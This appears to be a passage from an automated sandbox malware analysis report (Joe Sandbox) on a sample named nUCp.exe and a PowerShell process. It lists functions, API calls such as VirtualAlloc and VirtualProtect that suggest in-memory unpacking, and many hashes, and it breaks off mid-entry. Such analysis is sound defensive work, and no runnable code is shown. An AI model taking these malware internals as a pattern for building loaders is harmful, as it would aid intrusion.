Opcode ID: 981960e03ab117e2f33bc72c66b8f9e8951ae9881750349936055c9510e3430e
Instruction ID: f4cdfad74c058f6e9184ee39b1b9fbf749bfec228a9c61162b2c067e88eca441
Opcode Fuzzy Hash: 981960e03ab117e2f33bc72c66b8f9e8951ae9881750349936055c9510e3430e
Instruction Fuzzy Hash: C7621721A0DB894FE756AB3858556B4BFE1EF56330B4901FBD18EC7293DE18AC05C3A1

Function 00007FF7C0D95E25 Relevance: .4, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1405199053.00007FF7C0D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14a03c900578c2aa78faea2a8e69337c22ca4f7c2f0b31af7e15ea49ec21eea3
Instruction ID: 0dd775e9e42aa0ed0db32d2a25fd9c807b4cc141fe3cc539bfc02d3dcecd4683
Opcode Fuzzy Hash: 14a03c900578c2aa78faea2a8e69337c22ca4f7c2f0b31af7e15ea49ec21eea3
Instruction Fuzzy Hash: 33D1167190DA894FE796AF6888556B9BBE0FF46360B5801FED04DC7293DF18B805C391

Function 00007FF7C0D92DA7 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1405199053.00007FF7C0D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a1f9488278d621440cfbc6215321f7f159a4d505a0e59afe0e40b5e892efc61
Instruction ID: 163681d7acb618b904e24783342483ed0125d56fe6943749c65c7b235a798e9a
Opcode Fuzzy Hash: 8a1f9488278d621440cfbc6215321f7f159a4d505a0e59afe0e40b5e892efc61
Instruction Fuzzy Hash: AC11A722E1D9064BB2A8BA1864D61BDA2C1EF44731BD802B9E64FC3782DF08BC1152D1

Function 00007FF7C0CC5C05 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1404752992.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 344ae550aa189cfee030fe5dad0be6a80d281401a7062d5ced25e02183c3b3df
Instruction ID: df6d40b2d7e358816a083606dfc8a12fc05045bbe92da24e6dc442652641567e
Opcode Fuzzy Hash: 344ae550aa189cfee030fe5dad0be6a80d281401a7062d5ced25e02183c3b3df
Instruction Fuzzy Hash: 1501447111CB084FDB44EF0CE451AA6B7E0FB99364F50056DE58AC3651D626E881CB45

Non-executed Functions

Function 00007FF7C0CC20B8 Relevance: .6, Instructions: 640COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1404752992.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2396290656bea5cd6dc50c813f07ebbf23bb15a112c66a8f0aafa9b99dba0d60
Instruction ID: c34d4a8b3ba5de9a2e8200d4f6f197d91c5c20523a54797931965f2c6e469ac5
Opcode Fuzzy Hash: 2396290656bea5cd6dc50c813f07ebbf23bb15a112c66a8f0aafa9b99dba0d60
Instruction Fuzzy Hash: 66129967A0E6C64FE3225A3C9C650E5BFA0DF5367574D12F7C2C4CB193EE19284A83A1

Analysis Process: nUCp.exePID: 6328, Parent PID: 736COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.3%
Total number of Nodes:	1708
Total number of Limit Nodes:	27

Executed Functions

Function 00FF4E5A Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 89
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,3B9ACA00), ref: 00FF4E6D
RtlAllocateHeap.NTDLL(00000000), ref: 00FF4E74
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00FF4EA5
_wcsrchr.LIBVCRUNTIME ref: 00FF4EB8
lstrlenW.KERNEL32(-00000002), ref: 00FF4EDD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FF4F14
RtlFreeHeap.NTDLL(00000000), ref: 00FF4F1B
MulDiv.KERNEL32(00000001,80000000,80000000), ref: 00FF4F30

Strings

, xrefs: 00FF4EFA
(, xrefs: 00FF4EFF
@, xrefs: 00FF4F04

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFileFreeModuleName_wcsrchrlstrlen
String ID: $($@
API String ID: 443335681-2581157662
Opcode ID: 5169fbdad22cc45b85dcffbd38041d0d88b06016d1200044e19a1791bc4cfeee
Instruction ID: 4006ba2a31992ca5a5074df201fdb68f71826ef8fa532fd33378776bc7a7d2f3
Opcode Fuzzy Hash: 5169fbdad22cc45b85dcffbd38041d0d88b06016d1200044e19a1791bc4cfeee
Instruction Fuzzy Hash: EE210472D00308AEE7315264AC8EB7B3668DF45370F210115F709D71E6EB6DAC40EA61

Function 00FFC146 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00FFC255,00FFCAD9,?,00000000,00000000,00000000,?,00FFC3CE,00000022,FlsSetValue,01014078,01014080,00000000), ref: 00FFC207

Strings

api-ms-, xrefs: 00FFC19D
ext-ms-, xrefs: 00FFC1B1

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 3d73411b40433042dc8e79aa2bf1cb0adcfb09b9410df000a02f457549b08180
Instruction ID: 8eae847ce8d63314b9fedf00dc2d04643e457661ef27392b2d76858bf8002ab1
Opcode Fuzzy Hash: 3d73411b40433042dc8e79aa2bf1cb0adcfb09b9410df000a02f457549b08180
Instruction Fuzzy Hash: C8212732E4112DABCB328A60DD40A7A7769EF417B0F210214FE55E7296D779EE10D7E0

Function 010022CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 01002314

Part of subcall function 01002098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 010020C1
Part of subcall function 01002098: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0100226D

VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 01002366
VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 010023C0
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 010023F3

Strings

,, xrefs: 01002344

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$Free$Protect
String ID: ,
API String ID: 1004437363-3772416878
Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
Instruction ID: 24c570a7d23d2d6015eb3944a1f18c7c3fd122eb04dc84d9ee34956988aee8a9
Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
Instruction Fuzzy Hash: 8451077590071AAFDB11CFA9C884B9EBBF4FF08344F10851AF959A7280D770E954CBA4

Function 010022CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 01002314

Part of subcall function 01002098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 010020C1
Part of subcall function 01002098: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0100226D

VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 01002366
VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 010023C0
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 010023F3

Strings

,, xrefs: 01002344

Memory Dump Source

Source File: 00000004.00000003.1390003579.0000000001002000.00000040.00000001.01000000.00000008.sdmp, Offset: 01002000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_1002000_nUCp.jbxd

Similarity

API ID: Virtual$Alloc$Free$Protect
String ID: ,
API String ID: 1004437363-3772416878
Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
Instruction ID: 24c570a7d23d2d6015eb3944a1f18c7c3fd122eb04dc84d9ee34956988aee8a9
Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
Instruction Fuzzy Hash: 8451077590071AAFDB11CFA9C884B9EBBF4FF08344F10851AF959A7280D770E954CBA4

Function 00FF8946 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00FF8A50,?,00FF8940,00000000,?,?,00FF8A50,BCC996EE,?,00FF8A50), ref: 00FF8957
TerminateProcess.KERNEL32(00000000,?,00FF8940,00000000,?,?,00FF8A50,BCC996EE,?,00FF8A50), ref: 00FF895E
ExitProcess.KERNEL32 ref: 00FF8970

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7c1b751f0508b46633e3e1f467a8555542e0b2220125fe90b4bd807f3c2eef66
Instruction ID: 2843ae4f6a81779ec760341620aec37aa749c09c0579c28eabf6b3bf51234154
Opcode Fuzzy Hash: 7c1b751f0508b46633e3e1f467a8555542e0b2220125fe90b4bd807f3c2eef66
Instruction Fuzzy Hash: 0AD06731400208ABCF226FA0DC099793F27AE40795B244114BA4995026CF7E9952EB81

Function 01002098 Relevance: 2.7, APIs: 2, Instructions: 163
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 010020C1
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0100226D

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction ID: 05e0e6d32987452464b69470267e13392ab3d76d345f51dfe85f99ddce2965de
Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction Fuzzy Hash: B4719C75E04249DFEB42CF98C985BEDBBF0AF09314F144095E5A5F7281C234AA91DF64

Function 01002098 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 010020C1
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0100226D

Memory Dump Source

Source File: 00000004.00000003.1390003579.0000000001002000.00000040.00000001.01000000.00000008.sdmp, Offset: 01002000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_1002000_nUCp.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction ID: 05e0e6d32987452464b69470267e13392ab3d76d345f51dfe85f99ddce2965de
Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction Fuzzy Hash: B4719C75E04249DFEB42CF98C985BEDBBF0AF09314F144095E5A5F7281C234AA91DF64

Function 00FFC211 Relevance: 1.6, APIs: 1, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0370f6c1358a500b0696f779e0fd1533534c94dd10ca3e2d68daceb0ab05d284
Instruction ID: dd5d16481741eba0f0ce138c770493092610af0c1d6d7d7c5c507993d588e6fc
Opcode Fuzzy Hash: 0370f6c1358a500b0696f779e0fd1533534c94dd10ca3e2d68daceb0ab05d284
Instruction Fuzzy Hash: D501F93360023C9F9F228EEDED809763765EFC53307204224FA0497159DA3AD945B7C1

Non-executed Functions

Function 00FF55A9 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00FF55B5
IsDebuggerPresent.KERNEL32 ref: 00FF5681
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FF56A1
UnhandledExceptionFilter.KERNEL32(?), ref: 00FF56AB

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 298d95ba064b52277955f8631442407fd961f294bae155874542ea90f3b36ec3
Instruction ID: 2fd32836ef574cacaec3f6f1334c730df70b113c825d2ae10394fb0c22bed304
Opcode Fuzzy Hash: 298d95ba064b52277955f8631442407fd961f294bae155874542ea90f3b36ec3
Instruction Fuzzy Hash: 5E3138B5D0131CDBDB21DFA0D989BCCBBB8AF08704F1041AAE54DAB250EB759A85DF44

Function 00FF9AB4 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00FF9BAC
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00FF9BB6
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00FF9BC3

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d8fd8a2b8283293388fea36bd83e812941463f1ad3a8f6644e92d53f6971870b
Instruction ID: fbd08219332daa5ef7139ef3bbea97b9ddd245add4a8ea0250d0710b3bf53776
Opcode Fuzzy Hash: d8fd8a2b8283293388fea36bd83e812941463f1ad3a8f6644e92d53f6971870b
Instruction Fuzzy Hash: 4F31C27590122C9BCB21DF64DD8979CBBB8BF08310F6042EAE50CA7261EB749B85DF54

Function 00FF5845 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FF585B

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 81528685de541c0badea198b9bb2a6daad8d482d429e33d6b5c531178726574d
Instruction ID: 19d633f2db804db7da422532ff55f7d458a3f2586dd485f60b1c6a2602b4f07c
Opcode Fuzzy Hash: 81528685de541c0badea198b9bb2a6daad8d482d429e33d6b5c531178726574d
Instruction Fuzzy Hash: 0851BB71E11A098FEB28CF59D8913BAB7F0FB48724F10842AD685EB254D3B9D900DF50

Function 00FFA165 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ae701cf74909eae495ca93c48b3458e65e25e435aa206d769dba681d1e6a122
Instruction ID: 78edcad4c5e94a3a0abd930781c59394f403b8de9234e4fa2d118f663cd3bff3
Opcode Fuzzy Hash: 9ae701cf74909eae495ca93c48b3458e65e25e435aa206d769dba681d1e6a122
Instruction Fuzzy Hash: E741C0B5C0521DAEDF20DF69CC89ABABBB9AF45310F1442D9E50DD3221DA359E849F20

Function 01002277 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
Instruction ID: 96bef1942a341036335d5fb9a3a54da147665991db56eb45f9139712fa6ee162
Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
Instruction Fuzzy Hash: 07F06275A00200EFA756CF8DC54CC997BFAFB85710F6545D5E4049B2A1D3B0DD44CB61

Function 01002277 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.1390003579.0000000001002000.00000040.00000001.01000000.00000008.sdmp, Offset: 01002000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_1002000_nUCp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
Instruction ID: 96bef1942a341036335d5fb9a3a54da147665991db56eb45f9139712fa6ee162
Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
Instruction Fuzzy Hash: 07F06275A00200EFA756CF8DC54CC997BFAFB85710F6545D5E4049B2A1D3B0DD44CB61

Function 00FF72D1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

type_info::operator==.LIBVCRUNTIME ref: 00FF73F0
___TypeMatch.LIBVCRUNTIME ref: 00FF74FE
CatchIt.LIBVCRUNTIME ref: 00FF754F
_UnwindNestedFrames.LIBCMT ref: 00FF7650
CallUnexpected.LIBVCRUNTIME ref: 00FF766B

Strings

csm, xrefs: 00FF730E
csm, xrefs: 00FF737B
csm, xrefs: 00FF7427

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4119006552-393685449
Opcode ID: 34c7de161f2aafce6c2ab9f816e1bb6e67a4addf4ea01dc0590e4867c4aec9e5
Instruction ID: 0ca4e27995472594d3c623937b97b6b155f3ede59a2ca7476e2a2cec863b2328
Opcode Fuzzy Hash: 34c7de161f2aafce6c2ab9f816e1bb6e67a4addf4ea01dc0590e4867c4aec9e5
Instruction Fuzzy Hash: 7BB14B71C0830DEFCF25EFA4C8819BEBB75EF04320B184559EA11AB222D775DA51EB91

Function 00FF63D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 00FF6407
___except_validate_context_record.LIBVCRUNTIME ref: 00FF640F
_ValidateLocalCookies.LIBCMT ref: 00FF6498
__IsNonwritableInCurrentImage.LIBCMT ref: 00FF64C3
_ValidateLocalCookies.LIBCMT ref: 00FF6518

Strings

csm, xrefs: 00FF64AD

Memory Dump Source

Source File: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000004.00000002.1394133696.0000000000FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001012000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.0000000001019000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394153462.000000000101E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394273419.000000000101F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1394293120.0000000001021000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fa0000_nUCp.jbxd

Yara matches

Similarity

